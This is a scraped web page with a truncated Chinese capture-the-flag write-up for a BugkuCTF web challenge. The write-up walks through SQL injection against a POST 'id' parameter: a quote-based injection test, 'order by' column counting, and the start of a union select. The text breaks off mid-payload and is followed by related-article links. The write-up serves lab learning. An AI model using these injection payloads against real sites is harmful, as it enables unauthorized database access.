BugkuCTF-Web-成績單
輸入1,2,3有回顯,但是URL不變化,發現不是GET方法 查看源碼知用POST方法傳參,name爲id 先用payload:id=1’ and ‘1’=‘1,發現正確執行,則存在注入點。 用order by語句判斷字段個數: id=-1’ order by 5# 顯示不正常 id=-1’ order by 4# 顯示正常,則有4個字段 字段精確位置: id=-1’ union select 1,
相關文章
- 1. bugku成績單
- 2. Vue成績單
- 3. BugkuCTF 成績單
- 4. Bugku:web 成績單
- 5. 成績單
- 6. 成績單 (bugku--web)
- 7. BugKu之成績單
- 8. [LOJ2292] [THUSC2016] 成績單
- 9. BUGKU成績單(sql)
- 10. 單鏈表-學生成績
- 更多相關文章...
- • Eclipse 生成jar包 - Eclipse 教程
- • jQuery Mobile 表單 - jQuery Mobile 教程
- • TiDB 在摩拜單車在線數據業務的應用和實踐
- • 三篇文章瞭解 TiDB 技術內幕——說存儲
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. bugku成績單
- 2. Vue成績單
- 3. BugkuCTF 成績單
- 4. Bugku:web 成績單
- 5. 成績單
- 6. 成績單 (bugku--web)
- 7. BugKu之成績單
- 8. [LOJ2292] [THUSC2016] 成績單
- 9. BUGKU成績單(sql)
- 10. 單鏈表-學生成績